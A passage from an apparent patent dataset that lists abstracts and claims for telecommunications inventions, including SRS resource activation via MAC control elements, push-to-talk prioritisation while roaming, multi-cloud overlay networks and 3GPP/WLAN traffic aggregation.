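The point of carrying the identifier alongside the slot index is that the slot index alone is ambiguous after packet loss: a later frame may legitimately overwrite the slot, and only the identifier comparison detects that the stored frame is no longer the intended reference.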
9,159 | 9,159 | 16,277,220 | 2,413 | Systems and methods for Semi-Persistent Sounding Reference Signal (SP SRS) resource activation or deactivation are disclosed. In some embodiments, a method of operation of a wireless device in a cellular communications network comprises receiving, from a network node, a Medium Access Control (MAC) Control Element (CE). The MAC CE comprises an indication of a SP SRS resource set to be activated or deactivated and information that indicates a spatial relation for the SP SRS resource set to be activated or deactivated. In this manner, a MAC CE for SP SRS resource set activation or deactivation is provided in a manner that gives spatial relation information in an efficient and flexible manner. | 1. A method of operation of a wireless device in a cellular communications network, comprising:
receiving, from a network node, a Medium Access Control, MAC, Control Element, CE, comprising:
an indication of a semi-persistent sounding reference signal resource set to be activated or deactivated; and
information that indicates a spatial relation for the semi-persistent sounding reference signal resource set to be activated or deactivated. 2. The method of claim 1 wherein the information that indicates the spatial relation comprises:
an indication of a type of reference signal for which the spatial relation is provided; and
an identifier of a reference signal resource set for the type of reference signal for which the spatial relation is provided. 3. The method of claim 2 wherein the indication of the type of reference signal indicates that the type of reference signal is a Channel State Information Reference Signal, CSI-RS, a Synchronization Signal Block, SSB, or a Sounding Reference Signal, SRS. 4. The method of claim 2 wherein the indication of the type of reference signal comprises two bits that indicate the type of reference signal, wherein:
a first state of the two bits indicates that the type of reference signal is a first type of reference signal;
a second state of the two bits indicates that the type of reference signal is a second type of reference signal; and
a third state of the two bits indicates that the type of reference signal is a third type of reference signal. 5. The method of claim 4 wherein the first type of reference signal is a Channel State Information Reference Signal, CSI-RS, the second type of reference signal is a Synchronization Signal Block, SSB, and the third type of reference signal is a Sounding Reference Signal, SRS. 6. The method of claim 2 wherein the MAC CE comprises:
a first octet that comprises the indication of the semi-persistent sounding reference signal resource set to be activated or deactivated; and
a second octet that comprises the indication of the type of reference signal for which the spatial relation is provided and the identifier of the reference signal resource set for the type of reference signal for which the spatial relation is provided. 7. The method of claim 6 wherein:
if a first bit in the second octet is set to a first state:
the first bit serves as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Channel State Information Reference Signal, CSI-RS; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the CSI-RS; and
if the first bit in the second octet is set to a second state:
if a second bit in the second octet is set to a first state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Synchronization Signal Block, SSB; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the SSB; and
if the second bit in the second octet is set to a second state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Sounding Reference Signal, SRS; and
all but one of the remaining bits in the second octet serve as the identifier of the reference signal resource set for the SRS. 8. The method of claim 6 wherein:
a first bit in the second octet is set to a first state such that the first bit serves as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Channel State Information Reference Signal, CSI-RS; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the CSI-RS. 9. The method of claim 6 wherein:
a first bit in the second octet is set to a second state;
a second bit in the second octet is set to a first state such that the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Synchronization Signal Block, SSB; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the SSB. 10. The method of claim 6 wherein:
a first bit in the second octet is set to a second state;
a second bit in the second octet is set to a second state such that the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Sounding Reference Signal, SRS; and
all but one of the remaining bits in the second octet serve as the identifier of the reference signal resource set for the SRS. 11. The method of claim 1 wherein:
if a first bit of an octet of the MAC CE is set to a first state, remaining bits in the octet comprise a first set of fields;
if the first bit of the octet is set to a second state and a second bit of the octet is set to a first state, remaining bits in the octet comprise a second set of fields; and
if the first bit of the octet is set to a second state and the second bit of the octet is set to a second state, remaining bits in the octet comprise a third set of fields. 12. The method of claim 11 wherein the first set of fields comprises a field comprising bits providing an identifier of a Channel State Information Reference Signal, CSI-RS, resource set for which a spatial relation is indicated. 13. The method of claim 11 wherein the second set of fields comprises a field comprising bits providing an identifier of a Synchronization Signal Block, SSB, resource set for which a spatial relation is indicated. 14. The method of claim 11 wherein the third set of fields comprises a field comprising bits providing an identifier of a Sounding Reference Signal, SRS, resource set for which a spatial relation is indicated. 15. The method of claim 1 wherein the indication is an indication to activate the semi-persistent sounding reference signal resource set, and the method further comprises transmitting a sounding reference signal on the activated semi-persistent sounding reference signal resource set. 16. A wireless device for a cellular communications network, the wireless device comprising:
an interface comprising radio front end circuitry; and processing circuitry associated with the interface, the processing circuitry configured to cause the wireless device to:
receive, from a network node via the interface, a Medium Access Control, MAC, Control Element, CE, comprising:
an indication of a semi-persistent sounding reference signal resource set to be activated or deactivated; and
information that indicates a spatial relation for the semi-persistent sounding reference signal resource set to be activated or deactivated. 17. A method of operation of a network node in a cellular communications network, comprising:
transmitting, to a wireless device, a Medium Access Control, MAC, Control Element, CE, comprising:
an indication of a semi-persistent sounding reference signal resource set to be activated or deactivated; and
information that indicates a spatial relation for the semi-persistent sounding reference signal resource set to be activated or deactivated. 18. The method of claim 17 wherein the information that indicates the spatial relation comprises:
an indication of a type of reference signal for which the spatial relation is provided; and
an identifier of a reference signal resource set for the type of reference signal for which the spatial relation is provided. 19. The method of claim 18 wherein the MAC CE comprises:
a first octet that comprises the indication of the semi-persistent sounding reference signal resource set to be activated or deactivated; and
a second octet that comprises the indication of the type of reference signal for which the spatial relation is provided and the identifier of the reference signal resource set for the type of reference signal for which the spatial relation is provided. 20. The method of claim 19 wherein:
if a first bit in the second octet is set to a first state:
the first bit serves as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Channel State Information Reference Signal, CSI-RS; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the CSI-RS; and
if the first bit in the second octet is set to a second state:
if a second bit in the second octet is set to a first state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Synchronization Signal Block, SSB; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the SSB; and
if the second bit in the second octet is set to a second state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Sounding Reference Signal, SRS; and
all but one of the remaining bits in the second octet serve as the identifier of the reference signal resource set for the SRS. | Systems and methods for Semi-Persistent Sounding Reference Signal (SP SRS) resource activation or deactivation are disclosed. In some embodiments, a method of operation of a wireless device in a cellular communications network comprises receiving, from a network node, a Medium Access Control (MAC) Control Element (CE). The MAC CE comprises an indication of a SP SRS resource set to be activated or deactivated and information that indicates a spatial relation for the SP SRS resource set to be activated or deactivated. In this manner, a MAC CE for SP SRS resource set activation or deactivation is provided in a manner that gives spatial relation information in an efficient and flexible manner.1. A method of operation of a wireless device in a cellular communications network, comprising:
receiving, from a network node, a Medium Access Control, MAC, Control Element, CE, comprising:
an indication of a semi-persistent sounding reference signal resource set to be activated or deactivated; and
information that indicates a spatial relation for the semi-persistent sounding reference signal resource set to be activated or deactivated. 2. The method of claim 1 wherein the information that indicates the spatial relation comprises:
an indication of a type of reference signal for which the spatial relation is provided; and
an identifier of a reference signal resource set for the type of reference signal for which the spatial relation is provided. 3. The method of claim 2 wherein the indication of the type of reference signal indicates that the type of reference signal is a Channel State Information Reference Signal, CSI-RS, a Synchronization Signal Block, SSB, or a Sounding Reference Signal, SRS. 4. The method of claim 2 wherein the indication of the type of reference signal comprises two bits that indicate the type of reference signal, wherein:
a first state of the two bits indicates that the type of reference signal is a first type of reference signal;
a second state of the two bits indicates that the type of reference signal is a second type of reference signal; and
a third state of the two bits indicates that the type of reference signal is a third type of reference signal. 5. The method of claim 4 wherein the first type of reference signal is a Channel State Information Reference Signal, CSI-RS, the second type of reference signal is a Synchronization Signal Block, SSB, and the third type of reference signal is a Sounding Reference Signal, SRS. 6. The method of claim 2 wherein the MAC CE comprises:
a first octet that comprises the indication of the semi-persistent sounding reference signal resource set to be activated or deactivated; and
a second octet that comprises the indication of the type of reference signal for which the spatial relation is provided and the identifier of the reference signal resource set for the type of reference signal for which the spatial relation is provided. 7. The method of claim 6 wherein:
if a first bit in the second octet is set to a first state:
the first bit serves as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Channel State Information Reference Signal, CSI-RS; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the CSI-RS; and
if the first bit in the second octet is set to a second state:
if a second bit in the second octet is set to a first state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Synchronization Signal Block, SSB; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the SSB; and
if the second bit in the second octet is set to a second state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Sounding Reference Signal, SRS; and
all but one of the remaining bits in the second octet serve as the identifier of the reference signal resource set for the SRS. 8. The method of claim 6 wherein:
a first bit in the second octet is set to a first state such that the first bit serves as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Channel State Information Reference Signal, CSI-RS; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the CSI-RS. 9. The method of claim 6 wherein:
a first bit in the second octet is set to a second state;
a second bit in the second octet is set to a first state such that the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Synchronization Signal Block, SSB; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the SSB. 10. The method of claim 6 wherein:
a first bit in the second octet is set to a second state;
a second bit in the second octet is set to a second state such that the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Sounding Reference Signal, SRS; and
all but one of the remaining bits in the second octet serve as the identifier of the reference signal resource set for the SRS. 11. The method of claim 1 wherein:
if a first bit of an octet of the MAC CE is set to a first state, remaining bits in the octet comprise a first set of fields;
if the first bit of the octet is set to a second state and a second bit of the octet is set to a first state, remaining bits in the octet comprise a second set of fields; and
if the first bit of the octet is set to a second state and the second bit of the octet is set to a second state, remaining bits in the octet comprise a third set of fields. 12. The method of claim 11 wherein the first set of fields comprises a field comprising bits providing an identifier of a Channel State Information Reference Signal, CSI-RS, resource set for which a spatial relation is indicated. 13. The method of claim 11 wherein the second set of fields comprises a field comprising bits providing an identifier of a Synchronization Signal Block, SSB, resource set for which a spatial relation is indicated. 14. The method of claim 11 wherein the third set of fields comprises a field comprising bits providing an identifier of a Sounding Reference Signal, SRS, resource set for which a spatial relation is indicated. 15. The method of claim 1 wherein the indication is an indication to activate the semi-persistent sounding reference signal resource set, and the method further comprises transmitting a sounding reference signal on the activated semi-persistent sounding reference signal resource set. 16. A wireless device for a cellular communications network, the wireless device comprising:
an interface comprising radio front end circuitry; and processing circuitry associated with the interface, the processing circuitry configured to cause the wireless device to:
receive, from a network node via the interface, a Medium Access Control, MAC, Control Element, CE, comprising:
an indication of a semi-persistent sounding reference signal resource set to be activated or deactivated; and
information that indicates a spatial relation for the semi-persistent sounding reference signal resource set to be activated or deactivated. 17. A method of operation of a network node in a cellular communications network, comprising:
transmitting, to a wireless device, a Medium Access Control, MAC, Control Element, CE, comprising:
an indication of a semi-persistent sounding reference signal resource set to be activated or deactivated; and
information that indicates a spatial relation for the semi-persistent sounding reference signal resource set to be activated or deactivated. 18. The method of claim 17 wherein the information that indicates the spatial relation comprises:
an indication of a type of reference signal for which the spatial relation is provided; and
an identifier of a reference signal resource set for the type of reference signal for which the spatial relation is provided. 19. The method of claim 18 wherein the MAC CE comprises:
a first octet that comprises the indication of the semi-persistent sounding reference signal resource set to be activated or deactivated; and
a second octet that comprises the indication of the type of reference signal for which the spatial relation is provided and the identifier of the reference signal resource set for the type of reference signal for which the spatial relation is provided. 20. The method of claim 19 wherein:
if a first bit in the second octet is set to a first state:
the first bit serves as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Channel State Information Reference Signal, CSI-RS; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the CSI-RS; and
if the first bit in the second octet is set to a second state:
if a second bit in the second octet is set to a first state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Synchronization Signal Block, SSB; and
remaining bits in the second octet serve as the identifier of the reference signal resource set for the SSB; and
if the second bit in the second octet is set to a second state:
the first bit and the second bit serve as the indication of the type of reference signal for which the spatial relation is provided and the type of reference signal for which the spatial relation is provided is a Sounding Reference Signal, SRS; and
all but one of the remaining bits in the second octet serve as the identifier of the reference signal resource set for the SRS. | 2,400 |
9,160 | 9,160 | 15,958,320 | 2,462 | A method is provided that allows for prioritizing Push-To-Talk (PTT) service in a roamed network. PTT service is enabled for a mobile device at a first network. The mobile device roams to a second network that is of an older generation than the first network. It is determined that the mobile device has an active PTT subscription. PTT service is prioritized for the mobile device over circuit switched services on the second network. | 1. A method comprising:
enabling a mobile device for Push-To-Talk (PTT) service at a first network; roaming, by the mobile device, to a second network, the second network being of an older generation than the first network; determining that the mobile device has an active PTT subscription; and prioritizing PTT service for the mobile device over circuit switched services on the second network. 2. The method of claim 1, the method further comprising providing an indication on the mobile device that indicates that PTT service is prioritized for the mobile device over circuit switched services on the second network. 3. The method of claim 2, wherein the indication on the mobile device is a visual indicator on the mobile device. 4. The method of claim 2, wherein the indication on the mobile device is an audio indicator on the mobile device. 5. The method of claim 1, the method further comprising blocking incoming circuit switched voice calls. 6. The method of claim 1, the method further comprising disconnecting an ongoing voice call on the mobile device when a priority PTT call is placed at the mobile device. 7. The method of claim 1, wherein the step of determining that the mobile device has an active PTT subscription comprises receiving an identifier associated with the mobile device. 8. The method of claim 7, the method further comprising sending a message to a PTT server, the message indicating that circuit switched services are not enabled for the mobile device at the second network. 9. The method of claim 1, the method further comprising:
detecting that the mobile device has roamed back into the first network; and sending a location update command by a Home Subscriber Server, the location update command indicating that the mobile device is enabled for all allowed services. 10. The method of claim 9, the method further comprising clearing a Visitor Location Register at the second network of records related to the mobile device. 11. The method of claim 9, the method further comprising restoring services for the mobile device on the first network. 12. A method comprising:
enabling a mobile device for a mission critical service at a first network, the first network providing concurrent services to the mobile device; roaming, by the mobile device, to a second network, the second network not able to provide concurrent services to the mobile device; determining that the mobile device has an active subscription for the mission critical service; and prioritizing the mission critical service for the mobile device over circuit switched services on the second network. 13. The method of claim 12, the method further comprising blocking incoming circuit switched voice calls. 14. The method of claim 12, the method further comprising disconnecting an ongoing voice call on the mobile device when a priority mission critical call is placed at the mobile device. 15. The method of claim 12, the method further comprising:
detecting that the mobile device has roamed back into the first network; and sending a location update command by a Home Subscriber Server, the location update command indicating that the mobile device is enabled for all allowed services. 16. A communication system comprising a processor, the processor configured to:
enable a mobile device for Push-To-Talk (PTT) service; detect that the mobile device has roamed to a second network, the second network being of an older generation than the first network; determine that the mobile device has an active PTT subscription; and prioritize PTT service for the mobile device over circuit switched services on the second network. 17. The communication system of claim 16, wherein the processor is further configured to block incoming circuit switched voice calls. 18. The communication system of claim 16, wherein the processor is further configured to disconnect an ongoing voice call on the mobile device when a priority PTT call is placed at the mobile device. 19. The communication system of claim 16, wherein the processor is further configured to:
detect that the mobile device has roamed back into the first network; and send a location update command by a Home Subscriber Server, the location update command indicating that the mobile device is enabled for all allowed services. | A method is provided that allows for prioritizing Push-To-Talk (PTT) service in a roamed network. PTT service is enabled for a mobile device at a first network. The mobile device roams to a second network that is of an older generation than the first network. It is determined that the mobile device has an active PTT subscription. PTT service is prioritized for the mobile device over circuit switched services on the second network.1. A method comprising:
enabling a mobile device for Push-To-Talk (PTT) service at a first network; roaming, by the mobile device, to a second network, the second network being of an older generation than the first network; determining that the mobile device has an active PTT subscription; and prioritizing PTT service for the mobile device over circuit switched services on the second network. 2. The method of claim 1, the method further comprising providing an indication on the mobile device that indicates that PTT service is prioritized for the mobile device over circuit switched services on the second network. 3. The method of claim 2, wherein the indication on the mobile device is a visual indicator on the mobile device. 4. The method of claim 2, wherein the indication on the mobile device is an audio indicator on the mobile device. 5. The method of claim 1, the method further comprising blocking incoming circuit switched voice calls. 6. The method of claim 1, the method further comprising disconnecting an ongoing voice call on the mobile device when a priority PTT call is placed at the mobile device. 7. The method of claim 1, wherein the step of determining that the mobile device has an active PTT subscription comprises receiving an identifier associated with the mobile device. 8. The method of claim 7, the method further comprising sending a message to a PTT server, the message indicating that circuit switched services are not enabled for the mobile device at the second network. 9. The method of claim 1, the method further comprising:
detecting that the mobile device has roamed back into the first network; and sending a location update command by a Home Subscriber Server, the location update command indicating that the mobile device is enabled for all allowed services. 10. The method of claim 9, the method further comprising clearing a Visitor Location Register at the second network of records related to the mobile device. 11. The method of claim 9, the method further comprising restoring services for the mobile device on the first network. 12. A method comprising:
enabling a mobile device for a mission critical service at a first network, the first network providing concurrent services to the mobile device; roaming, by the mobile device, to a second network, the second network not able to provide concurrent services to the mobile device; determining that the mobile device has an active subscription for the mission critical service; and prioritizing the mission critical service for the mobile device over circuit switched services on the second network. 13. The method of claim 12, the method further comprising blocking incoming circuit switched voice calls. 14. The method of claim 12, the method further comprising disconnecting an ongoing voice call on the mobile device when a priority mission critical call is placed at the mobile device. 15. The method of claim 12, the method further comprising:
detecting that the mobile device has roamed back into the first network; and sending a location update command by a Home Subscriber Server, the location update command indicating that the mobile device is enabled for all allowed services. 16. A communication system comprising a processor, the processor configured to:
enable a mobile device for Push-To-Talk (PTT) service; detect that the mobile device has roamed to a second network, the second network being of an older generation than the first network; determine that the mobile device has an active PTT subscription; and prioritize PTT service for the mobile device over circuit switched services on the second network. 17. The communication system of claim 16, wherein the processor is further configured to block incoming circuit switched voice calls. 18. The communication system of claim 16, wherein the processor is further configured to disconnect an ongoing voice call on the mobile device when a priority PTT call is placed at the mobile device. 19. The communication system of claim 16, wherein the processor is further configured to:
detect that the mobile device has roamed back into the first network; and send a location update command by a Home Subscriber Server, the location update command indicating that the mobile device is enabled for all allowed services. | 2,400 |
9,161 | 9,161 | 15,972,086 | 2,461 | Some embodiments establish for an entity a virtual network over several public clouds of several public cloud providers and/or in several regions. In some embodiments, the virtual network is an overlay network that spans across several public clouds to interconnect one or more private networks (e.g., networks within branches, divisions, departments of the entity or their associated datacenters), mobile users, and SaaS (Software as a Service) provider machines, and other web applications of the entity. The virtual network in some embodiments can be configured to optimize the routing of the entity's data messages to their destinations for best end-to-end performance, reliability and security, while trying to minimize the routing of this traffic through the Internet. Also, the virtual network in some embodiments can be configured to optimize the layer 4 processing of the data message flows passing through the network. | 1. A method of forwarding data message flows through at least two public cloud datacenters of at least two different public cloud providers, the method comprising:
at an ingress forwarding element in a first public cloud datacenter,
receiving, from a first external machine outside of the public cloud datacenters, a data message addressed to a second external machine outside of the public cloud datacenters, said second external machine reachable through an egress forwarding element that is in a second public cloud datacenter;
encapsulating the data message with a first header that includes network addresses for the ingress and egress forwarding elements as source and destination addresses; and
encapsulating the data message with a second header that specifies source and destination network addresses as the network address of the ingress forwarding element and a network address of a next hop forwarding element that is in a public cloud datacenter and that is a next hop on a path to the egress forwarding element. 2. The method of claim 1, wherein the next hop forwarding element is in a third public cloud datacenter. 3. The method of claim 2, wherein the first, second and third public cloud datacenters belong to three different public cloud providers. 4. The method of claim 2, wherein the first and second public cloud datacenters belong to a first public cloud provider, while the third public cloud datacenter belongs to a different, second public cloud provider. 5. The method of claim 2, wherein the first and second public cloud datacenters belong to two different public cloud providers, while the third public cloud datacenter belongs to the public cloud provider of the first public cloud datacenter or the second public cloud datacenter. 6. The method of claim 2, wherein
the next hop forwarding element is a first next hop forwarding element, and the first next hop forwarding element identifies a second next hop forwarding element along the path as a next hop for the data message and in the second header specifies source and destination network addresses as the network addresses of the first next hop forwarding element and the second next hop forwarding element. 7. The method of claim 6, wherein the second next hop forwarding element is the egress forwarding element. 8. The method of claim 7, wherein after receiving the encapsulated data message, the egress forwarding element determines from the destination network address in the first header that the encapsulated data message is addressed to the egress forwarding element, removes the first and second headers from the data message, and forwards the data message to the second external machine. 9. The method of claim 6, wherein the second next hop forwarding element is a fourth forwarding element that is different than the second forwarding element. 10. The method of claim 1, wherein the next hop forwarding element is the second forwarding element. 11. The method of claim 1 further comprising:
processing at the ingress and egress forwarding elements data messages belonging to different tenants of a virtual network provider that defines different virtual networks over public cloud datacenters for the different tenants;
in the encapsulating first header of the received message, storing a tenant identifier that identifies the tenant associated with the first and second external machines. 12. The method of claim 11, wherein the encapsulation of the data message with the first and second headers defines, for the first tenant, an overlay virtual network that spans a group of networks of a group of public cloud datacenters including the first and second public cloud datacenters. 13. The method of claim 12, wherein the tenants are corporations and the virtual networks are corporate wide area networks (WANs). 14. The method of claim 1, wherein
the first external machine is one of a machine in a first branch office, a machine in a private first datacenter, or a remote machine, and the second external machine is a machine in a second branch office or a machine in a private second datacenter. 15. A system for establishing a virtual network for an entity, the system comprising:
a first set of forwarding elements in a first multi-tenant public cloud operated by a first public cloud provider; and a second set of forwarding elements in a second multi-tenant public cloud operated by a second public cloud provider different than the first public cloud provider; said first and second sets of forwarding elements establishing first and second overlay virtual networks for first and second tenants of a virtual network provider with each overlay virtual network spanning both first and second multi-tenant public clouds, each overlay virtual network established by encapsulating each data message with first and second headers, the first header identifying ingress/egress interfaces in the virtual network for the data message, and the second header identifying a next hop in the overlay network for the data message. 16. The system of claim 15, wherein the next hop forwarding element is in a third public cloud datacenter. 17. The system of claim 16, wherein the first, second and third public cloud datacenters belong to three different public cloud providers. 18. The system of claim 16, wherein the first and second public cloud datacenters belong to a first public cloud provider, while the third public cloud datacenter belongs to a different, second public cloud provider. 19. The system of claim 16, wherein the first and second public cloud datacenters belong to two different public cloud providers, while the third public cloud datacenter belongs to the public cloud provider of the first public cloud datacenter or the second public cloud datacenter. 20. The system of claim 16, wherein
the next hop forwarding element is a first next hop forwarding element, and the first next hop forwarding element identifies a second next hop forwarding element along the path as a next hop for the data message and in the second header specifies source and destination network addresses as the network addresses of the first next hop forwarding element and the second next hop forwarding element. | Some embodiments establish for an entity a virtual network over several public clouds of several public cloud providers and/or in several regions. In some embodiments, the virtual network is an overlay network that spans across several public clouds to interconnect one or more private networks (e.g., networks within branches, divisions, departments of the entity or their associated datacenters), mobile users, and SaaS (Software as a Service) provider machines, and other web applications of the entity. The virtual network in some embodiments can be configured to optimize the routing of the entity's data messages to their destinations for best end-to-end performance, reliability and security, while trying to minimize the routing of this traffic through the Internet. Also, the virtual network in some embodiments can be configured to optimize the layer 4 processing of the data message flows passing through the network.1. A method of forwarding data message flows through at least two public cloud datacenters of at least two different public cloud providers, the method comprising:
at an ingress forwarding element in a first public cloud datacenter,
receiving, from a first external machine outside of the public cloud datacenters, a data message addressed to a second external machine outside of the public cloud datacenters, said second external machine reachable through an egress forwarding element that is in a second public cloud datacenter;
encapsulating the data message with a first header that includes network addresses for the ingress and egress forwarding elements as source and destination addresses; and
encapsulating the data message with a second header that specifies source and destination network addresses as the network address of the ingress forwarding element and a network address of a next hop forwarding element that is in a public cloud datacenter and that is a next hop on a path to the egress forwarding element. 2. The method of claim 1, wherein the next hop forwarding element is in a third public cloud datacenter. 3. The method of claim 2, wherein the first, second and third public cloud datacenters belong to three different public cloud providers. 4. The method of claim 2, wherein the first and second public cloud datacenters belong to a first public cloud provider, while the third public cloud datacenter belongs to a different, second public cloud provider. 5. The method of claim 2, wherein the first and second public cloud datacenters belong to two different public cloud providers, while the third public cloud datacenter belongs to the public cloud provider of the first public cloud datacenter or the second public cloud datacenter. 6. The method of claim 2, wherein
the next hop forwarding element is a first next hop forwarding element, and the first next hop forwarding element identifies a second next hop forwarding element along the path as a next hop for the data message and in the second header specifies source and destination network addresses as the network addresses of the first next hop forwarding element and the second next hop forwarding element. 7. The method of claim 6, wherein the second next hop forwarding element is the egress forwarding element. 8. The method of claim 7, wherein after receiving the encapsulated data message, the egress forwarding element determines from the destination network address in the first header that the encapsulated data message is addressed to the egress forwarding element, removes the first and second headers from the data message, and forwards the data message to the second external machine. 9. The method of claim 6, wherein the second next hop forwarding element is a fourth forwarding element that is different than the second forwarding element. 10. The method of claim 1, wherein the next hop forwarding element is the second forwarding element. 11. The method of claim 1 further comprising:
processing at the ingress and egress forwarding elements data messages belonging to different tenants of a virtual network provider that defines different virtual networks over public cloud datacenters for the different tenants;
in the encapsulating first header of the received message, storing a tenant identifier that identifies the tenant associated with the first and second external machines. 12. The method of claim 11, wherein the encapsulation of the data message with the first and second headers defines, for the first tenant, an overlay virtual network that spans a group of networks of a group of public cloud datacenters including the first and second public cloud datacenters. 13. The method of claim 12, wherein the tenants are corporations and the virtual networks are corporate wide area networks (WANs). 14. The method of claim 1, wherein
the first external machine is one of a machine in a first branch office, a machine in a private first datacenter, or a remote machine, and the second external machine is a machine in a second branch office or a machine in a private second datacenter. 15. A system for establishing a virtual network for an entity, the system comprising:
a first set of forwarding elements in a first multi-tenant public cloud operated by a first public cloud provider; and a second set of forwarding elements in a second multi-tenant public cloud operated by a second public cloud provider different than the first public cloud provider; said first and second sets of forwarding elements establishing first and second overlay virtual networks for first and second tenants of a virtual network provider with each overlay virtual network spanning both first and second multi-tenant public clouds, each overlay virtual network established by encapsulating each data message with first and second headers, the first header identifying ingress/egress interfaces in the virtual network for the data message, and the second header identifying a next hop in the overlay network for the data message. 16. The system of claim 15, wherein the next hop forwarding element is in a third public cloud datacenter. 17. The system of claim 16, wherein the first, second and third public cloud datacenters belong to three different public cloud providers. 18. The system of claim 16, wherein the first and second public cloud datacenters belong to a first public cloud provider, while the third public cloud datacenter belongs to a different, second public cloud provider. 19. The system of claim 16, wherein the first and second public cloud datacenters belong to two different public cloud providers, while the third public cloud datacenter belongs to the public cloud provider of the first public cloud datacenter or the second public cloud datacenter. 20. The system of claim 16, wherein
the next hop forwarding element is a first next hop forwarding element, and the first next hop forwarding element identifies a second next hop forwarding element along the path as a next hop for the data message and in the second header specifies source and destination network addresses as the network addresses of the first next hop forwarding element and the second next hop forwarding element. | 2,400 |
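The two-header encapsulation this row's claims recite (a fixed first header naming the overlay ingress/egress forwarding elements plus a tenant identifier, and a second header rewritten at each hop) can be sketched as below. This is an illustrative model only, not the patented implementation; every class, field, and forwarding-element name is an assumption.

```python
from dataclasses import dataclass, replace

@dataclass(frozen=True)
class Header:
    src: str
    dst: str

@dataclass(frozen=True)
class OverlayPacket:
    inner: Header    # ingress -> egress forwarding elements, fixed for the path (claim 1)
    outer: Header    # current hop -> next hop, rewritten per hop (claim 6)
    tenant_id: int   # identifies the tenant's virtual network (claim 11)
    payload: bytes

def encapsulate(payload: bytes, tenant_id: int, ingress: str, egress: str, next_hop: str) -> OverlayPacket:
    """Ingress forwarding element: wrap the data message in both headers."""
    return OverlayPacket(inner=Header(ingress, egress),
                         outer=Header(ingress, next_hop),
                         tenant_id=tenant_id, payload=payload)

def forward(pkt: OverlayPacket, this_hop: str, next_hop: str) -> OverlayPacket:
    """Intermediate hop: rewrite only the outer (second) header."""
    return replace(pkt, outer=Header(this_hop, next_hop))

def decapsulate(pkt: OverlayPacket, egress: str) -> bytes:
    """Egress: confirm the inner destination, then strip both headers (claim 8)."""
    assert pkt.inner.dst == egress
    return pkt.payload
```

Note how the inner header survives unchanged across hops while the outer header changes, which is what lets an overlay path span datacenters of different public cloud providers.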
9,162 | 9,162 | 15,030,535 | 2,415 | A method and communication node for providing traffic aggregation between a 3GPP network and a WLAN network when a wireless device is connected to an access point of the WLAN network. The communication node establishes an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently. The communication node can then communicate data and/or messages over the WLAN network across the aggregation interface, without requiring any modifications or adaptations in the WLAN network. The communication node may be the wireless device or the base station. | 1. A method performed by a communication node for providing traffic aggregation of a 3GPP network and a WLAN network when a wireless device is connected to the WLAN network, the method comprising:
establishing an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently, and communicating data and/or messages across the aggregation interface. 2. A method according to claim 1, wherein the aggregation interface is implemented as a tunnel in which aggregation frames are encapsulated. 3. A method according to claim 2, wherein the aggregation frames comprise any of: Medium Access Control, MAC, frames, Radio Link Control, RLC, frames and Packet Data Convergence Protocol, PDCP, frames. 4. A method according to claim 2, wherein the tunnel is a Layer 2 over Layer 3 tunnel where Layer 2 frames are encapsulated in Layer 3 frames. 5. A method according to claim 2, wherein the tunnel is implemented as any of:
GTP, GPRS Tunnelling Protocol, IPSec, Internet Protocol Security, GRE, Generic Routing Encapsulation, L2TP, Layer 2 Tunnelling Protocol, L2TPv3, Layer 2 Tunnelling Protocol Version 3, and L2F, Layer 2 Forwarding Protocol. 6. A method according to claim 1, wherein said traffic aggregation comprises simultaneous use of 3GPP and WLAN links for transmission of packets belonging to an IP traffic flow. 7. A method according to claim 1, wherein the communicated data and/or messages are forwarded over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by using an existing secure tunnel on an SWu interface between the wireless device and the ePDG. 8. A method according to claim 1, wherein the communicated data and/or messages are forwarded over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by setting up a new secure tunnel for the aggregation traffic between the wireless device and the ePDG. 9. A method according to claim 1, wherein the communication node is the wireless device, and wherein the wireless device receives address information signalled from the base station and uses the received address information for establishing the aggregation interface. 10. A method according to claim 1, wherein the communication node is the base station, and wherein the base station receives address information signalled from the wireless device and uses the received address information for establishing the aggregation interface. 11. A method according to claim 9, wherein said address information has a format which complies with a tunnelling protocol used on the aggregation interface. 12. 
